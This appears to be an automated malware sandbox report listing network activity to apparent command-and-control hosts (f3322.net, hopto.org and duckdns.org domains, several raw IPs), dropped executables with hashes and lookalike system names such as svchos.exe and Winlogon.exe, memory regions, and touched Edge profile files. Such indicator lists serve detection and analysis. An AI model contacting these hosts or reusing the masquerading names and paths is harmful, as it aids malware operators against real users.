US 8.8.8.8:53 hackerinvasion.f3322.net udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 scan.hitmanpro.com udp
NL 52.174.35.5:443 scan.hitmanpro.com tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 kazya1.hopto.org udp
CA 172.98.92.42:58491 tcp

Files

memory/4068-0-0x0000000074E62000-0x0000000074E63000-memory.dmp

memory/4068-1-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4068-2-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\healastounding.exe

MD5 6fb798f1090448ce26299c2b35acf876
SHA1 451423d5690cffa02741d5da6e7c45bc08aefb55
SHA256 b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f
SHA512 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

MD5 ed666bf7f4a0766fcec0e9c8074b089b
SHA1 1b90f1a4cb6059d573fff115b3598604825d76e6
SHA256 d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264
SHA512 d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

memory/3636-44-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

MD5 0fd7de5367376231a788872005d7ed4f
SHA1 658e4d5efb8b14661967be2183cc60e3e561b2b6
SHA256 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd
SHA512 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863

memory/3636-50-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4828-62-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4068-67-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Users\Admin\AppData\Roaming\gay.exe

MD5 8eedc01c11b251481dec59e5308dccc3
SHA1 24bf069e9f2a1f12aefa391674ed82059386b0aa
SHA256 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d
SHA512 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

memory/2336-118-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3636-151-0x0000000074E60000-0x0000000075411000-memory.dmp

C:\Windows\SysWOW64\TXPlatforn.exe

MD5 a4329177954d4104005bce3020e5ef59
SHA1 23c29e295e2dbb8454012d619ca3f81e4c16e85a
SHA256 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd
SHA512 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

memory/5052-172-0x0000000000400000-0x000000000044F000-memory.dmp

C:\Users\Admin\AppData\Roaming\4.exe

MD5 e6dace3f577ac7a6f9747b4a0956c8d7
SHA1 86c71169025b822a8dfba679ea981035ce1abfd1
SHA256 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63
SHA512 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268

memory/5052-165-0x0000000000400000-0x000000000044F000-memory.dmp

C:\Windows\SysWOW64\240629765.txt

MD5 2d4c94d56bc6ff4b67a7e4c78823128f
SHA1 64f0eabe0213c7e996f53f64daf1b1cd41cd165e
SHA256 4d53ccb9a375d968ac7bd0670f3cda71d195bae334445d97c46e96b6dbe34a84
SHA512 8e476563ea4876c7170febdb9c75f93298caf8f02aa0cdfee13e7735a85f0e60eb12e22b191e7432bdfcd9507d940df3dfb54969f170ede2bcf2e456ca6a6a4e

C:\Users\Admin\AppData\Local\Temp\svchos.exe

MD5 3b377ad877a942ec9f60ea285f7119a2
SHA1 60b23987b20d913982f723ab375eef50fafa6c70
SHA256 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84
SHA512 af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f

memory/764-153-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/764-152-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/764-149-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-146-0x0000000000400000-0x00000000007C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

MD5 8f1c8b40c7be588389a8d382040b23bb
SHA1 bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a
SHA256 ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1
SHA512 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f

C:\Users\Admin\AppData\Roaming\a.exe

MD5 52cfd35f337ca837d31df0a95ce2a55e
SHA1 88eb919fa2761f739f02a025e4f9bf1fd340b6ff
SHA256 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448
SHA512 b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

memory/2336-121-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2336-120-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2908-109-0x00000000008B0000-0x00000000008C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\aaa.exe

MD5 860aa57fc3578f7037bb27fc79b2a62c
SHA1 a14008fe5e1eb88bf46266de3d5ee5db2e0a722b
SHA256 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29
SHA512 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

C:\Users\Admin\AppData\Roaming\Opus.exe

MD5 759185ee3724d7563b709c888c696959
SHA1 7c166cc3cbfef08bb378bcf557b1f45396a22931
SHA256 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641
SHA512 ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

C:\Users\Admin\AppData\Roaming\test.exe

MD5 7e50b292982932190179245c60c0b59b
SHA1 25cf641ddcdc818f32837db236a58060426b5571
SHA256 a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8
SHA512 c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

C:\Users\Admin\AppData\Roaming\___11.19.exe

MD5 a071727b72a8374ff79a695ecde32594
SHA1 b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc
SHA256 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745
SHA512 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

memory/4828-58-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/1820-47-0x0000000000400000-0x0000000000625000-memory.dmp

C:\Users\Admin\AppData\Roaming\22.exe

MD5 dbf9daa1707b1037e28a6e0694b33a4b
SHA1 ddc1fcec1c25f2d97c372fffa247969aa6cd35ef
SHA256 a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6
SHA512 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd

memory/3636-30-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4812-174-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/788-179-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

MD5 78d40b12ffc837843fbf4de2164002f6
SHA1 985bdffa69bb915831cd6b81783aef3ae4418f53
SHA256 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44
SHA512 c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79

memory/4812-211-0x0000000006370000-0x0000000006382000-memory.dmp

memory/4812-205-0x0000000005CB0000-0x00000000062C8000-memory.dmp

memory/788-204-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-213-0x0000000006390000-0x000000000649A000-memory.dmp

memory/788-218-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

MD5 870d6e5aef6dea98ced388cce87bfbd4
SHA1 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54
SHA256 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0
SHA512 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566

memory/4812-219-0x00000000064A0000-0x00000000064DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\3.exe

MD5 748a4bea8c0624a4c7a69f67263e0839
SHA1 6955b7d516df38992ac6bff9d0b0f5df150df859
SHA256 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e
SHA512 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp

MD5 28219e12dd6c55676bdf791833067e9d
SHA1 a4c854d929404e5073d16610c62dfa331c9727a0
SHA256 d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540
SHA512 e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161

memory/4812-235-0x0000000006520000-0x000000000656C000-memory.dmp

memory/788-229-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

MD5 b14120b6701d42147208ebf264ad9981
SHA1 f3cff7ac8e6c1671d2c3387648e54f80957196de
SHA256 d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97
SHA512 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

memory/788-184-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/788-185-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/4812-176-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/4448-239-0x0000000000400000-0x00000000019AA000-memory.dmp

C:\ProgramData\kaosdma.txt

MD5 2c807857a435aa8554d595bd14ed35d1
SHA1 9003a73beceab3d1b1cd65614347c33117041a95
SHA256 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b
SHA512 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

memory/1492-265-0x0000000000140000-0x00000000001D4000-memory.dmp

memory/1492-301-0x0000000000980000-0x000000000098C000-memory.dmp

memory/1492-302-0x0000000000990000-0x000000000099A000-memory.dmp

memory/1492-325-0x00000000009B0000-0x00000000009BC000-memory.dmp

memory/4448-323-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-329-0x00000000060E0000-0x00000000064A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp

MD5 2862e61d09852ea2886c036af0465051
SHA1 45e30b14543868213f7f1cba0a1e0cc840fb2cd2
SHA256 d4ba6219d0aff5a36d129a8475cf35b00043d205f751f63ddd56a5c7d4a03ff3
SHA512 33dfd9d12adaa19dd3d4dd7013930e233dd3ff1d114e1e86e50d20ffa848a27582eebdffc09ab974b8de86316c01da6f6254f349992ad507d0f8b13cf0e36579

memory/5052-332-0x0000000000400000-0x000000000044F000-memory.dmp

memory/4448-312-0x00000000060E0000-0x00000000064A2000-memory.dmp

C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe

MD5 889b99c52a60dd49227c5e485a016679
SHA1 8fa889e456aa646a4d0a4349977430ce5fa5e2d7
SHA256 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910
SHA512 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641

memory/4448-309-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-306-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-304-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/1492-303-0x00000000009A0000-0x00000000009AC000-memory.dmp

memory/4448-319-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4448-315-0x00000000060E0000-0x00000000064A2000-memory.dmp

memory/4828-339-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4828-344-0x0000000074E60000-0x0000000075411000-memory.dmp

memory/4464-355-0x0000000000420000-0x00000000004E9000-memory.dmp

memory/4464-356-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4464-354-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4464-353-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4448-361-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/3636-364-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3636-362-0x0000000000400000-0x0000000000495000-memory.dmp

memory/4384-372-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-373-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-374-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-383-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-382-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-381-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-380-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-379-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

memory/4384-378-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

C:\Windows\Help\Winlogon.exe

MD5 a8ddace9435fe395325fc45dde8bd0a3
SHA1 dcf9baaa9e3a27450debf4f35112376ed005c800
SHA256 6e81d7c71b3e8d731e11ad75d3dac02a4210c9f90fac618af5c00cbce3718658
SHA512 2c6006e42ecf31da02a4584e69c0e55390be5a405353307582852728b2ceb65033f3f5cd0b6465b3a1541d19eab95c61b394e3403dee558196c2f2969d82b196

C:\Windows\Help\active_desktop_render.dll

MD5 07a36097730666fe9e5434d85a5ab989
SHA1 780ca47c15932ed1f9640c17b9bb340410a52338
SHA256 1fb4cee4d83d424e0bfcbfd97169ef717b3ebdcc5d01ba7c7c547ae606ad5c3c
SHA512 4a08080471c660856af724e4480ec721c22c462346e293d93e2f9577e6d669c6b51cd81ef96dfad943c791dfd7f7f0c2d5234a82d81ce5f1c01bb493cda34085

memory/3888-427-0x00007FF612BA0000-0x00007FF613120000-memory.dmp

memory/3888-451-0x00007FF612BA0000-0x00007FF613120000-memory.dmp

memory/4448-465-0x0000000000400000-0x00000000019AA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d1055a071a0979c8605092c0e2abd71
SHA1 90caba3066c3fafc14c3ecdcc2621a340bfae94d
SHA256 706a2eaf2e8d892373ae7643d53c89e6b4bd9e34de07c93ce72d7f045847810d
SHA512 ec0c9e1b1a089b81742c0a08f48955462abb35ca25400e2a0b129e73f20f6d95cbcf09e776918015df3a9ade167a48b041818ae5ead032001d53e7f1ef3c91c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a6b5c1d78a466f8d9858a8c6890a70b2
SHA1 dc95cf6cce8357f2e1a7fcc299d632f16ba3f549
SHA256 c0b87ec1d43dc3db6c307b9e36f298cab5424a88bae1d524f12b6cc49c1cce73
SHA512 8fcbe8002ad80e70ebafcd7e01a477f0464b684cb6d9e13bcb22a92ca07de0bdbfdb504e95ccba3e56dfc31f7ad8a87afae173304dee77529f25d4609bd232bc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2870b02dd1dc3b5df0ba481312ee85ad
SHA1 5771a48f1de9904dd7ba92233a921a553c015c5f
SHA256 41fc2934bcd8509c15634adc63d4f83359c945e5418805d24ccba93c545b14f3
SHA512 2a88164e54c7811da23cdb4065a940a1595b9dc824fbb71755ade0a6c8986c3a84a976bf215e6e2ae36969c96b62eb57dda1cf3213a066c2ea74e46a41af0950

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 c813a1b87f1651d642cdcad5fca7a7d8
SHA1 0e6628997674a7dfbeb321b59a6e829d0c2f4478
SHA256 df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3
SHA512 af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 b275fa8d2d2d768231289d114f48e35f
SHA1 bb96003ff86bd9dedbd2976b1916d87ac6402073
SHA256 1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1
SHA512 d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7421f3dc3bca7e7da99f5596fd498037
SHA1 9bf166876952b94c3ccc23e857929bc8893740b1
SHA256 ec15ae480e6e8546236693850695b73254ea2b24b007f1ab7014836ddc665fad
SHA512 f9e6438c8975f522be23b3f90afbf2b4ed82f9fcb27ff0521835c790c668d160e5372a549fb7f7cb4b6e5e7b951b5b65696ccd734f5b595533848bc2087a8a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7e896888f1dffbbfa68a56444837b439
SHA1 d25023163c43d5216d4151fcd6f66ca440f343d7
SHA256 ddeea2f0bc19336d7cb8cd2f87aee0faacefd87ff640a76b7a3284a32da8e4d8
SHA512 099bf717d6938ff3f93cd2133a7a1d09ef5b385833f59fde207208fbd1deaee7653d748ea0913c5bd7364286990839d11536a0fac97d0f8f28a25c8a988d6d21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe591b5e.TMP

MD5 1a75df0cf8a38cdb6e09aeef848801c2
SHA1 79c4c7c56decf847f8af98996922725ab9b4fa96
SHA256 d0791ca45ea1015edab4511607c50f29e0adf95ce23e104c4d133275951a78bf
SHA512 0e7363ad4d2e07ea0b91273469c789af8fe1b534a9d8679cd19076974ee2675fa63b9750234f5e932caef82721c2f756bc131f7da8571b0c60dd8c48a1011347

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 2be38925751dc3580e84c3af3a87f98d
SHA1 8a390d24e6588bef5da1d3db713784c11ca58921
SHA256 1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b
SHA512 1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 9f96d459817e54de2e5c9733a9bbb010
SHA1 afbadc759b65670865c10b31b34ca3c3e000cd31
SHA256 51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609
SHA512 aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 e29b448723134a2db688bf1a3bf70b37
SHA1 3c8eba27ac947808101fa09bfe83723f2ab8d6b0
SHA256 349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69
SHA512 4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cdf8a4727ca2841a99adea8e0c188c3c
SHA1 d3cce1e6240d95094a8a651591cf069102ae659f
SHA256 88764f2c0db9a95848272cc02c5f14923d9e3e30aefa4df817cbc94101c8519d
SHA512 6390ae2ca87cf55114209f4c06ada81e534318e24ede2fdfc145315c5cd20f9efa61b10dc6a8e8d0ff5d6f8747303017038cc50d38d9915c53167a29540d2d59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8f33c349a04cb08aeefbdd0b4ae513eb
SHA1 2da5557e317644ae0e38b86e1e2ae01a3bac630e
SHA256 cec1988e72fc7b1f74a63cc0d29950517527f395783289d8ba0cdf211e93f113
SHA512 c02ca655721a65bf86b784bad69f3d9c87f61b0638d03b131c2290a179c8200c0399e93cb9182c534a6affe0a6c601429a0f6e38d4ba882f2a03a00866d7b74b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4acd7aa52d4d23faed87afd84dc86e4d
SHA1 4d4a5bd593c958184be32902b3dbf2f51437449c
SHA256 38c643957086b960a1d4b303224ce2aeeccaff63a521e329fb798d32974251d0
SHA512 a40b34fc7b8dda2a129758592a2ce83fb9e4ccc6212fb93b7ce56fd977973f6216182095609ad714387a4cea5f9dcaee69339f1f41bd91ee50615f689bbf32f7

C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload

MD5 10dc710dd495e9078ce79b26e18591e0
SHA1 aef434d6b77158dd2accd746bbc727bbc3367adc
SHA256 be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15
SHA512 959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fe936d5a8ca1db0d0fad682a39803be8
SHA1 c3408e1080c66bd1f7a2c5c78cc17990259523b6
SHA256 cfa4188133a9e40364d8c32f96e354c35eecb0a65df22ad974fcab1fb919b3ce
SHA512 e08bf22c7aa5b13fc4b3cf85c77f39810ad89661a33af4c50a9618064c5bed055ecdde9c4e385c344046018f249e2ea9041770e25018ca848c5e225b053c530b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dd2caf1f2ad8e03772db28326f7351cb
SHA1 bb915775112d636a13b1a3bfc0e03fddae13202d
SHA256 92cd2d831dbdb080d30c06feef0149335202908e9475eb2b8319d5ed1f3c0a07
SHA512 3c55b40ef69a2de73a3af36c88617fcbabfe22af38344bacb3b4793ca89a749f9b5084b1bf13726e225abd60c3431b01186011aecd46bebd2599fcf1bd8bde20

C:\Windows\System32\drivers\hitmanpro37.sys

MD5 55b9678f6281ff7cb41b8994dabf9e67
SHA1 95a6a9742b4279a5a81bef3f6e994e22493bbf9f
SHA256 eb5d9df12ae2770d0e5558e8264cbb1867c618217d10b5115690ab4dcfe893c6
SHA512 d2270c13dc8212b568361f9d7d10210970b313d8cd2b944f63a626f6e7f2feb19671d3fcdbdf35e593652427521c7c18050c1181dc4c114da96db2675814ab40

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 20e7f34c44271d6cde2a092645b15dba
SHA1 86d7ebfdb069f7e0854f93fee1b7490c13b5f5a2
SHA256 f8ab4ff2e5cb6cb4be3e3806abe5449d4d3756b93f36e0225c993743c1942640
SHA512 38c0d450c41eac45eb63c123c1886690dd484f06d369dd98cb37f44237b8c802d9ce44ea5c3c342e2c5dd8740a639acdfb131131124e3f1c7a670cf335706288

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e7fbbf59f7b19738e76605c5516db1f2
SHA1 b6b388d9e8f1c16c8cc3ee48bb39c27b9e0aefda
SHA256 3c4d4d142d4130295ac28fd97855c7d25f989dbf6ca7a90277f03619d092e762
SHA512 d335e8b4c6615a7faf5f6d7dc34864f38456a3105dc7bb5a68409cfbe05fda332bfe8547f4983172b2b332434b63a2a97b3f505638175dfdb25a3893dd4d02a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000005

MD5 fc97b88a7ce0b008366cd0260b0321dc
SHA1 4eae02aecb04fa15f0bb62036151fa016e64f7a9
SHA256 6388415a307a208b0a43b817ccd9e5fcdda9b6939ecd20ef4c0eda1aa3a0e49e
SHA512 889a0db0eb5ad4de4279b620783964bfda8edc6b137059d1ec1da9282716fe930f8c4ebfadea7cd5247a997f8d4d2990f7b972a17106de491365e3c2d2138175

